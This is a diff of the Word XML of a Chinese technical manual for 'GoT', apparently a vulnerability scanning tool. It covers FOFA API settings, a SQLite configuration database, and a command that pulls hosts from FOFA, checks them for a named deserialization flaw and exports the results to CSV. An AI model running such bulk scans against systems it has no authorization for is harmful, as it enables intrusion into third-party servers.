-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>setting.json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>文件</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>setting.json文件</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6485,9 +7397,63 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>"fofa_email"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>""</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:line="285" w:lineRule="atLeast"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -6496,9 +7462,63 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>fofa_email</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>"fafa_key"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>""</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:line="285" w:lineRule="atLeast"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -6507,7 +7527,7 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>"</w:t>
+        <w:t>"fofa_size"</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6527,9 +7547,15 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>""</w:t>
-      </w:r>
-      <w:r>
+        <w:t>"10000"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:line="285" w:lineRule="atLeast"/>
+        <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
           <w:color w:val="CCCCCC"/>
@@ -6537,15 +7563,8 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:line="285" w:lineRule="atLeast"/>
-        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
           <w:color w:val="CCCCCC"/>
@@ -6553,159 +7572,15 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>fafa_key</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>""</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:line="285" w:lineRule="atLeast"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>"fofa_size"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>"10000"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:line="285" w:lineRule="atLeast"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
         <w:t>}</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -6755,6 +7630,12 @@
               </w:rPr>
               <w:t>并发数</w:t>
             </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>，默认50</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -6769,7 +7650,6 @@
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -6779,7 +7659,6 @@
               </w:rPr>
               <w:t>response_time</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6813,30 +7692,29 @@
       <w:pPr>
         <w:pStyle w:val="2"/>
         <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>4.1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
           <w:color w:val="auto"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>4.1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
         <w:t>F</w:t>
       </w:r>
       <w:r>
@@ -6844,40 +7722,28 @@
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>ofa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>联动</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>打开</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>setting.json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>文件</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t>ofa联动</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>打开setting.json文件</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -6899,7 +7765,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId32"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6921,42 +7787,24 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>填入</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>fofa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>的信息，默认</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>vip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>是一万条信息一次</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>填入fofa的信息，默认vip是一万条信息一次</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -6977,7 +7825,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6999,6 +7847,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -7007,37 +7860,21 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>GoT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>fofa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -condition vuln="西软云</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>XMS_FoxLookupInvoker</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">接口存在反序列化漏洞" -proxy </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId31" w:history="1">
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">GoT </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">fofa -condition vuln="西软云XMS_FoxLookupInvoker接口存在反序列化漏洞" -proxy </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId34" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="ae"/>
@@ -7053,28 +7890,24 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>直接从</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>fofa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>中取出数据随后进行漏洞验证并导出到123.csv文件中</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>直接从fofa中取出数据随后进行漏洞验证并导出到123.csv文件中</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -7096,7 +7929,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32"/>
+                    <a:blip r:embed="rId35"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>

--- a/GoT技术文档.docx
+++ b/GoT技术文档.docx
@@ -21,6 +21,7 @@
           <w:szCs w:val="72"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
@@ -29,6 +30,7 @@
         </w:rPr>
         <w:t>GoT</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1286,21 +1288,38 @@
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>数据库sqlite</w:t>
+        <w:t>数据库</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>sqlite</w:t>
       </w:r>
       <w:bookmarkEnd w:id="1"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>sqllite数据库使用工具市面上有很多，这里我建议使用</w:t>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>sqllite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>数据库使用工具市面上有很多，这里我建议使用</w:t>
       </w:r>
       <w:r>
         <w:t>DB Browser for SQLite</w:t>
@@ -1311,14 +1330,30 @@
         </w:rPr>
         <w:t>，下载地址：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId6" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="ae"/>
-          </w:rPr>
-          <w:t>https://sqlitebrowser.org/dl/</w:t>
-        </w:r>
-      </w:hyperlink>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText>HYPERLINK "https://sqlitebrowser.org/dl/"</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ae"/>
+        </w:rPr>
+        <w:t>https://sqlitebrowser.org/dl/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ae"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1346,7 +1381,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId6"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1415,7 +1450,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId7"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1459,6 +1494,7 @@
         </w:rPr>
         <w:t xml:space="preserve">1.2 </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
@@ -1473,6 +1509,7 @@
         </w:rPr>
         <w:t>onfig.db</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
@@ -1492,7 +1529,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>在config.db中，存在三个表</w:t>
+        <w:t>在</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>config.db</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>中，存在三个表</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1521,7 +1572,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId8"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1564,6 +1615,7 @@
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>S</w:t>
       </w:r>
@@ -1571,7 +1623,14 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>qlite_sequence：不知道干什么的，突然出现的一个表，删不掉了</w:t>
+        <w:t>qlite_sequence</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：不知道干什么的，突然出现的一个表，删不掉了</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1654,7 +1713,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId9"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1715,7 +1774,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId10"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1863,6 +1922,7 @@
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
